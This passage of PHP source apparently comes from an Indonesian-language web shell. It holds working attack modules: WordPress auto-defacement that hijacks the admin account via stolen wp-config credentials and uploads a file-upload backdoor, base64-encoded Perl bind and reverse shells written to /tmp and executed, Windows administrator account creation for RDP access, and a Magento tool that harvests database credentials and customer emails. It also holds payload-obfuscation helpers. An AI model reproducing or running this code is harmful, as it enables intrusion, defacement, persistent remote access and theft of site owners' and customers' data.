2980 "pwd" => "$pass",
2981 "rememberme" => "forever",
2982 "wp-submit" => "$wp_submit",
2983 "redirect_to" => "$web",
2984 "testcookie" => "1",
2985 );
2986 $ch = curl_init($cek);
2987 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2988 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2989 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2990 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2991 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2992 curl_setopt($ch, CURLOPT_POST, 1);
2993 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2994 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2995 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2996 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2997 $data = curl_exec($ch);
2998 curl_close($ch);
2999 return $data;
3000 }
3001 $scan = $_POST['link_config'];
3002 $link_config = scandir($scan);
3003 $script = htmlspecialchars($_POST['script']);
3004 $user = "pr!v@t3";
3005 $pass = "pr!v@t3";
3006 $passx = md5($pass);
3007 foreach($link_config as $dir_config) {
3008 if(!is_file("$scan/$dir_config")) continue;
3009 $config = file_get_contents("$scan/$dir_config");
3010 if(preg_match("/WordPress/", $config)) {
3011 $dbhost = ambilkata($config,"DB_HOST', '","'");
3012 $dbuser = ambilkata($config,"DB_USER', '","'");
3013 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3014 $dbname = ambilkata($config,"DB_NAME', '","'");
3015 $dbprefix = ambilkata($config,"table_prefix = '","'");
3016 $prefix = $dbprefix."users";
3017 $option = $dbprefix."options";
3018 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3019 $db = mysql_select_db($dbname);
3020 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3021 $result = mysql_fetch_array($q);
3022 $id = $result[ID];
3023 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3024 $result2 = mysql_fetch_array($q2);
3025 $target = $result2[option_value];
3026 if($target == '') {
3027 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
3028 } else {
3029 echo "[+] $target <br>";
3030 }
3031 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
3032 if(!$conn OR !$db OR !$update) {
3033 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
3034 mysql_close($conn);
3035 } else {
3036 $site = "$target/wp-login.php";
3037 $site2 = "$target/wp-admin/theme-install.php?upload";
3038 $b1 = anucurl($site2);
3039 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
3040 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
3041 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
3042 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
3043 $www = "m.php";
3044 $fp5 = fopen($www,"w");
3045 fputs($fp5,$upload3);
3046 $post2 = array(
3047 "_wpnonce" => "$anu2",
3048 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
3049 "themezip" => "@$www",
3050 "install-theme-submit" => "Install Now",
3051 );
3052 $ch = curl_init("$target/wp-admin/update.php?bom&action=upload-theme");
3053 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3054 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3055 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3056 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3057 curl_setopt($ch, CURLOPT_POST, 1);
3058 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
3059 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3060 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3061 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3062 $data3 = curl_exec($ch);
3063 curl_close($ch);
3064 $y = date("Y");
3065 $m = date("m");
3066 $namafile = "id.php";
3067 $fpi = fopen($namafile,"w");
3068 fputs($fpi,$script);
3069 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
3070 curl_setopt($ch6, CURLOPT_POST, true);
3071 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
3072 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
3073 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
3074 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
3075 curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
3076 $postResult = curl_exec($ch6);
3077 curl_close($ch6);
3078 $as = "$target/k.php";
3079 $bs = anucurl($as);
3080 if(preg_match("#$script#is", $bs)) {
3081 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
3082 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
3083 } else {
3084 echo "[-] <font color='red'>gagal mepes...</font><br>";
3085 echo "[!!] coba aja manual: <br>";
3086 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
3087 echo "[+] username: <font color=lime>$user</font><br>";
3088 echo "[+] password: <font color=lime>$pass</font><br><br>";
3089 }
3090 mysql_close($conn);
3091 }
3092 }
3093 }
3094 } else {
3095 echo "<center><h1>WordPress Auto Deface</h1>
3096 <form method='post'>
3097 <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
3098 <input type='text' name='script' height='10' size='50' placeholder='Hacked by pr!v@t3' required><br>
3099 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
3100 </form>
3101 <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
3102 </center>";
3103 }
3104} elseif($_GET['do'] == 'auto_dwp2') {
3105 if($_POST['auto_deface_wp']) {
3106 function anucurl($sites) {
3107 $ch = curl_init($sites);
3108 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3109 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3110 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3111 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
3112 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3113 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3114 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3115 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3116 curl_setopt($ch, CURLOPT_COOKIESESSION,true);
3117 $data = curl_exec($ch);
3118 curl_close($ch);
3119 return $data;
3120 }
3121 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
3122 $post = array(
3123 "log" => "$userr",
3124 "pwd" => "$pass",
3125 "rememberme" => "forever",
3126 "wp-submit" => "$wp_submit",
3127 "redirect_to" => "$web",
3128 "testcookie" => "1",
3129 );
3130 $ch = curl_init($cek);
3131 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3132 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3133 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3134 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3135 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3136 curl_setopt($ch, CURLOPT_POST, 1);
3137 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
3138 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3139 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3140 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3141 $data = curl_exec($ch);
3142 curl_close($ch);
3143 return $data;
3144 }
3145 $link = explode("\r\n", $_POST['link']);
3146 $script = htmlspecialchars($_POST['script']);
3147 $user = "pr!v@t3";
3148 $pass = "pr!v@t3";
3149 $passx = md5($pass);
3150 foreach($link as $dir_config) {
3151 $config = anucurl($dir_config);
3152 $dbhost = ambilkata($config,"DB_HOST', '","'");
3153 $dbuser = ambilkata($config,"DB_USER', '","'");
3154 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3155 $dbname = ambilkata($config,"DB_NAME', '","'");
3156 $dbprefix = ambilkata($config,"table_prefix = '","'");
3157 $prefix = $dbprefix."users";
3158 $option = $dbprefix."options";
3159 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3160 $db = mysql_select_db($dbname);
3161 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3162 $result = mysql_fetch_array($q);
3163 $id = $result[ID];
3164 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3165 $result2 = mysql_fetch_array($q2);
3166 $target = $result2[option_value];
3167 if($target == '') {
3168 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
3169 } else {
3170 echo "[+] $target <br>";
3171 }
3172 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
3173 if(!$conn OR !$db OR !$update) {
3174 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
3175 mysql_close($conn);
3176 } else {
3177 $site = "$target/wp-login.php";
3178 $site2 = "$target/wp-admin/theme-install.php?upload";
3179 $b1 = anucurl($site2);
3180 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
3181 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
3182 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
3183 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
3184 $www = "m.php";
3185 $fp5 = fopen($www,"w");
3186 fputs($fp5,$upload3);
3187 $post2 = array(
3188 "_wpnonce" => "$anu2",
3189 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
3190 "themezip" => "@$www",
3191 "install-theme-submit" => "Install Now",
3192 );
3193 $ch = curl_init("$target/wp-admin/update.php?bom&action=upload-theme");
3194 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3195 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3196 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3197 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3198 curl_setopt($ch, CURLOPT_POST, 1);
3199 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
3200 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3201 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3202 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3203 $data3 = curl_exec($ch);
3204 curl_close($ch);
3205 $y = date("Y");
3206 $m = date("m");
3207 $namafile = "id.php";
3208 $fpi = fopen($namafile,"w");
3209 fputs($fpi,$script);
3210 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
3211 curl_setopt($ch6, CURLOPT_POST, true);
3212 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
3213 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
3214 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
3215 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
3216 curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
3217 $postResult = curl_exec($ch6);
3218 curl_close($ch6);
3219 $as = "$target/k.php";
3220 $bs = anucurl($as);
3221 if(preg_match("#$script#is", $bs)) {
3222 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
3223 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
3224 } else {
3225 echo "[-] <font color='red'>gagal mepes...</font><br>";
3226 echo "[!!] coba aja manual: <br>";
3227 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
3228 echo "[+] username: <font color=lime>$user</font><br>";
3229 echo "[+] password: <font color=lime>$pass</font><br><br>";
3230 }
3231 mysql_close($conn);
3232 }
3233 }
3234 } else {
3235 echo "<center><h1>WordPress Auto Deface V.2</h1>
3236 <form method='post'>
3237 Link Config: <br>
3238 <textarea name='link' placeholder='http://target.com/priv_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
3239 <input type='text' name='script' height='10' size='50' placeholder='Hacked by pr!v@t3' required><br>
3240 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
3241 </form></center>";
3242 }
3243} elseif($_GET['do'] == 'network') {
3244 echo "<form method='post'>
3245 <u>Bind Port:</u> <br>
3246 PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
3247 <input type='submit' name='sub_bp' value='>>'>
3248 </form>
3249 <form method='post'>
3250 <u>Back Connect:</u> <br>
3251 Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>
3252 PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
3253 <input type='submit' name='sub_bc' value='>>'>
3254 </form>";
3255 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
3256 if(isset($_POST['sub_bp'])) {
3257 $f_bp = fopen("/tmp/bp.pl", "w");
3258 fwrite($f_bp, base64_decode($bind_port_p));
3259 fclose($f_bp);
3260
3261 $port = $_POST['port_bind'];
3262 $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
3263 sleep(1);
3264 echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
3265 unlink("/tmp/bp.pl");
3266 }
3267 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
3268 if(isset($_POST['sub_bc'])) {
3269 $f_bc = fopen("/tmp/bc.pl", "w");
3270 fwrite($f_bc, base64_decode($bind_connect_p));
3271 fclose($f_bc);
3272
3273 $ipbc = $_POST['ip_bc'];
3274 $port = $_POST['port_bc'];
3275 $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
3276 sleep(1);
3277 echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
3278 unlink("/tmp/bc.pl");
3279 }
3280}elseif($_GET['do'] == 'hash')
3281 {
3282$submit= $_POST['enter'];
3283if (isset($submit)) {
3284$pass = $_POST['password']; // password
3285$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
3286$hash = md5($pass); // md5 hash #1
3287$md4 = hash("md4",$pass);
3288$hash_md5 = md5($salt.$pass); // md5 hash with salt #2
3289$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
3290$hash1 = sha1($pass); // sha1 hash #4
3291$sha256 = hash("sha256",$text);
3292$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
3293$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
3294$base64_encode = base64_encode($pass); // Base64 Encode
3295}
3296echo '
3297<table align="center">
3298<tr><td><center><h1>Password Hash</h1></center><br><br></td></tr>
3299<form action="" method="post">
3300<tr><td><strong>Masukan kata yang ingin di encrypt : </strong> <input type="text" name="password" size="40" /> </td></tr>
3301<tr><td><input type="submit" name="enter" value="hash"/> <br><br></td></tr>
3302<tr><td><h1>Hasil Hash </h1></td></tr>
3303<tr><td><p>Original Password : <input type=text size=50 value='.$pass.'></p></td></tr>
3304<tr><td><p>MD5 : <input type=text size=50 value='.$hash.'></p></td></tr>
3305<tr><td><p>Base64 Encode : <input type=text size=50 value='.$base64_encode.'></p></td></tr>
3306<tr><td><p>MD4 : <input type=text size=50 value='.$md4.'></p></td></tr>
3307<tr><td><p>MD5 with Salt : <input type=text size=50 value='.$hash_md5.'></p></td></tr>
3308<tr><td><p>MD5 with Salt & Sha1 : <input type=text size=50 value='.$hash_md5_double.'></p></td></tr>
3309<tr><td><p>Sha1 : <input type=text size=50 value='.$hash1.'></p></td></tr>
3310<tr><td><p>Sha256 : <input type=text size=50 value='.$sha256.'></p></td></tr>
3311<tr><td><p>Sha1 with Salt : <input type=text size=50 value='.$hash1_sha1.'></p></td></tr>
3312<tr><td><p>Sha1 with Salt & MD5 : <input type=text size=50 value='.$hash1_sha1_double.'></p></td></tr>
3313</table>';
3314}elseif($_GET['do'] == 'string') {
3315$text = $_POST['code'];
3316?><center><br><b>-=[ S c r i p t E n d c o d e]=-</b><br>
3317<form method="post"><br>
3318<textarea name="code"></textarea><br>
3319<select size="1" name="ope">
3320<option value="urlencode">url</option>
3321<option value="base64">Base64</option>
3322<option value="ur">convert_uu</option>
3323<option value="gzinflates">gzinflate - base64</option>
3324<option value="jancok">str_rot13 - base64_dcode</option>
3325<option value="gzinflate">str_rot13 - gzinflate - base64</option>
3326<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
3327<option value="Pelo">gzinflate - str_rot13 - base64_decode</option>
3328<option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
3329</select> <input type='submit' name='submit' value='Encode'>
3330</form>
3331
3332<?php
3333 $submit = $_POST['submit'];
3334 if (isset($submit)) {
3335 $op = $_POST["ope"];
3336 switch ($op) {
3337 case 'base64':
3338 $codi = base64_encode($text);
3339 break;
3340 case 'str':
3341 $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
3342 break;
3343 case 'gzinflate':
3344 $codi = base64_encode(gzdeflate(str_rot13($text)));
3345 break;
3346 case 'jancok':
3347 $codi = base64_encode(str_rot13($text));
3348 break;
3349 case 'gzinflates':
3350 $codi = base64_encode(gzdeflate($text));
3351 break;
3352 case 'str2':
3353 $codi = base64_encode(str_rot13($text));
3354 break;
3355 case 'urlencode':
3356 $codi = rawurlencode($text);
3357 break;
3358 case 'Pelo':
3359 $codi = base64_encode(str_rot13(gzdeflate($text)));
3360 break;
3361 case 'ur':
3362 $codi = convert_uuencode($text);
3363 break;
3364 case 'url':
3365 $codi = base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
3366 break;
3367 default:
3368 break;
3369 }
3370 }
3371 echo '<textarea readonly>' . $codi . '</textarea></center>';
3372
3373
3374}elseif($_GET['do'] == 'rdp') {
3375 if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
3376 if($_POST['create']) {
3377 $user = htmlspecialchars($_POST['user']);
3378 $pass = htmlspecialchars($_POST['pass']);
3379 if(preg_match("/$user/", exe("net user"))) {
3380 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Sudah Ada</font>";
3381 } else {
3382 $add_user = exe("net user $user $pass /add");
3383 $add_groups1 = exe("net localgroup Administrators $user /add");
3384 $add_groups2 = exe("net localgroup Administrator $user /add");
3385 $add_groups3 = exe("net localgroup Administrateur $user /add");
3386 echo "[ RDP ACCOUNT INFO ]<br>
3387 ------------------------------<br>
3388 IP: <font color=lime>".$ip."</font><br>
3389 Username: <font color=lime>$user</font><br>
3390 Password: <font color=lime>$pass</font><br>
3391 ------------------------------<br><br>
3392 [ STATUS ]<br>
3393 ------------------------------<br>
3394 ";
3395 if($add_user) {
3396 echo "[add user] -> <font color='lime'>Berhasil Ndan</font><br>";
3397 } else {
3398 echo "[add user] -> <font color='red'>Gagal Ndan</font><br>";
3399 }
3400 if($add_groups1) {
3401 echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
3402 } elseif($add_groups2) {
3403 echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
3404 } elseif($add_groups3) {
3405 echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
3406 } else {
3407 echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
3408 }
3409 echo "------------------------------<br>";
3410 }
3411 } elseif($_POST['s_opsi']) {
3412 $user = htmlspecialchars($_POST['r_user']);
3413 if($_POST['opsi'] == '1') {
3414 $cek = exe("net user $user");
3415 echo "Checking username <font color=lime>$user</font> ....... ";
3416 if(preg_match("/$user/", $cek)) {
3417 echo "[ <font color=lime>Sudah ada</font> ]<br>
3418 ------------------------------<br><br>
3419 <pre>$cek</pre>";
3420 } else {
3421 echo "[ <font color=red>Belum ada</font> ]";
3422 }
3423 } elseif($_POST['opsi'] == '2') {
3424 $cek = exe("net user $user indoxploit");
3425 if(preg_match("/$user/", exe("net user"))) {
3426 echo "[change password: <font color=lime>pr!v@t3</font>] -> ";
3427 if($cek) {
3428 echo "<font color=lime>Berhasil</font>";
3429 } else {
3430 echo "<font color=red>Gagal</font>";
3431 }
3432 } else {
3433 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Belum ada</font>";
3434 }
3435 } elseif($_POST['opsi'] == '3') {
3436 $cek = exe("net user $user /DELETE");
3437 if(preg_match("/$user/", exe("net user"))) {
3438 echo "[remove user: <font color=lime>$user</font>] -> ";
3439 if($cek) {
3440 echo "<font color=lime>Berhasil</font>";
3441 } else {
3442 echo "<font color=red>Gagal</font>";
3443 }
3444 } else {
3445 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Belum ada</font>";
3446 }
3447 } else {
3448 //
3449 }
3450 } else {
3451 echo "-- Create RDP --<br>
3452 <form method='post'>
3453 <input type='text' name='user' placeholder='username' value='pr!v@t3' required>
3454 <input type='text' name='pass' placeholder='password' value='pr!v@t3' required>
3455 <input type='submit' name='create' value='>>'>
3456 </form>
3457 -- Option --<br>
3458 <form method='post'>
3459 <input type='text' name='r_user' placeholder='username' required>
3460 <select name='opsi'>
3461 <option value='1'>Cek Username</option>
3462 <option value='2'>Ubah Password</option>
3463 <option value='3'>Hapus Username</option>
3464 </select>
3465 <input type='submit' name='s_opsi' value='>>'>
3466 </form>
3467 ";
3468 }
3469 } else {
3470 echo "<font color=red>Bukan Windows Ndan -_-.</font>";
3471 }
3472}elseif ($_GET['do'] == 'magento'){
3473echo '
3474<Center><h2 a>SC Leaking Magento</h2 a>
3475<form action="" method="post">
3476<input type="text" value="'.$dir.'/app/etc/local.xml" name="shcpatch" placeholder="http://localhost/" class="boxtitle">
3477<select class="boxtitle" name="cms">
3478 <option>Magento</option>
3479</select>
3480<input class="boxtitle" type="submit" name="submit" value="Scan Now!"/>
3481</form>
3482</Center>';
3483error_reporting(0);
3484class shc
3485{
3486 public function drop(){
3487 unlink(basename($_SERVER['PHP_SELF']));
3488 }
3489 public function get($location){
3490 $shc = file_get_contents($location);
3491 return $shc;
3492 }
3493 public function dpremove($data){
3494 $shcUniX = array_unique($data);
3495 return $shcUniX;
3496 }
3497 public function count($data){
3498 return "------------ Total Email : [ ".count($data) . " ]------------\r\n";
3499 }
3500 public function dbmagento($data){
3501 $shc_regexhost = "/<host><![CDATA[]+(.*?)[]]]><\\/host>/";
3502 $shc_regexusername = "/<username><![CDATA[]+(.*?)[]]]><\\/username>/";
3503 $shc_regexpassword = "/<password><![CDATA[]+(.*?)[]]]><\\/password>/";
3504 $shc_regexdatabase = "/<dbname><![CDATA[]+(.*?)[]]]><\\/dbname>/";
3505 preg_match($shc_regexhost, $data, $shcleak_1);
3506 preg_match($shc_regexusername, $data, $shcleak_2);
3507 preg_match($shc_regexpassword, $data, $shcleak_3);
3508 preg_match($shc_regexdatabase, $data, $shcleak_4);
3509 $shc_host = $shcleak_1[1];
3510 $shc_user = $shcleak_2[1];
3511 $shc_pass = $shcleak_3[1];
3512 $shc_db = $shcleak_4[1];
3513 $shc_json = array(
3514 'host' => $shc_host,
3515 'username' => $shc_user,
3516 'password' => $shc_pass,
3517 'database' => $shc_db,
3518 );
3519 return json_encode(array('shc_db' => $shc_json)
3520 );
3521 }
3522 public function shc_dbg($data){
3523 $jdata = json_decode(shc::dbmagento($data),true);
3524 if($jdata['shc_db']['host']=="localhost"){
3525 echo '<br><center> Host : <font color="red">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center> <br>';
3526 }else{
3527 echo '<br><center>Host : <font color="green">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center><br>';
3528 }
3529 mysql_connect($jdata['shc_db']['host'], $jdata['shc_db']['username'],$jdata['shc_db']['password']);
3530 mysql_select_db($jdata['shc_db']['database']);
3531 $query = array(
3532 'admin_user' => 'SELECT * FROM admin_user' ,
3533 'aw_blog_comment' => 'SELECT * FROM aw_blog_comment' ,
3534 'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' ,
3535 'customer_entity' => 'SELECT * FROM customer_entity' ,
3536 'newsletter_subscriber' => 'SELECT * FROM newsletter_subscriber' ,
3537 'newsletter_template' => 'SELECT * FROM newsletter_template' ,
3538 'sales_flat_order_address' => 'SELECT * FROM sales_flat_order_address' ,
3539 'sales_flat_quote' => 'SELECT * FROM sales_flat_quote' ,
3540 'sales_recurring_profile' => 'SELECT * FROM sales_recurring_profile'
3541 );
3542
3543 $shcolom = array(
3544 'admin_user' => 'email' ,
3545 'aw_blog_comment' => 'email' ,
3546 'core_email_queue_recipients' => 'recipient_email' ,
3547 'customer_entity' => 'email' ,
3548 'newsletter_subscriber' => 'subscriber_email' ,
3549 'newsletter_template' => 'template_sender_email' ,
3550 'sales_flat_order_address' => 'email' ,
3551 'sales_flat_quote' => 'customer_email' ,
3552 'sales_recurring_profile' => 'SELECT * FROM admin_user'
3553 );
3554 foreach ($query as $shc_key => $shc_query) {
3555 $hasil = mysql_query($shc_query);
3556 while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
3557 $mail[] = $kolom_db[$shcolom[$shc_key]];
3558 }
3559 }
3560 return shc::dpremove($mail);
3561 }
3562}
3563error_reporting(0);
3564file_put_contents($_GET['shcpatch'], file_get_contents($_GET['shcpatchl']));
3565if($_POST['submit']){
3566$data = shc::get($_POST['shcpatch']);
3567$data = shc::shc_dbg($data);
3568shc ::count($data);
3569foreach ($data as $value) {echo $value."\r\n";}
3570echo '
3571<center><br>
3572<textarea class="boxclose" style="margin: 0px; width: 527px; height: 172px;">
